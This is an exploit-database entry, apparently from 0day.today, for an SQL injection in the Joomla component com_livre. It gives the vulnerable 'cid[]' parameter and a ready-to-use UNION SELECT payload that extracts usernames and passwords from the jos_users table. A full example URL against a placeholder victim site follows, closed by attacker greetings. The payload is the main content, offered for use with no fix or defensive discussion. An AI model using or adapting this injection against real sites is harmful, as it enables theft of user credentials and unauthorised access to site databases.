Joomla Component com_livre SQL Injection Vulnerability

2010-07-27T00:00:00
ID 1337DAY-ID-13482
Type zdt
Reporter Lagripe-Dz
Modified 2010-07-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================
Joomla Component com_livre SQL Injection Vulnerability
======================================================


# Date: 27/07/2010
# Author : Lagripe-Dz & Mca-Crb
# Category: webapps/0day
# Tested on: [ win xp sp2 ]
# DORK : inurl:"No Dorks 4 Kids"
==========================================================
?
[+] Vulnerable File :
http://www.site.com/index.php?option=com_livres&controller=livre&task=view&cid[]=[SQL]
?
[+] ExploiT :
index.php?option=com_livres&controller=livre&task=view&cid[]=-1+Union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
?
[+] Example :
http://www.victime.com/index.php?option=com_livres&controller=livre&task=view&cid[]=-1+Union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
?
======================================================================================
Greetz 2 :

k1nG_J0k3r , FliT0x-Dz , Forza-Dz , TXB9 , DZ-Z3RO ,Mr.Adel ,

IslamDzNet , WaZo , WolF-Dz & A11 "Dz" .. Contre A1-3atayin



#  0day.today [2018-03-13]  #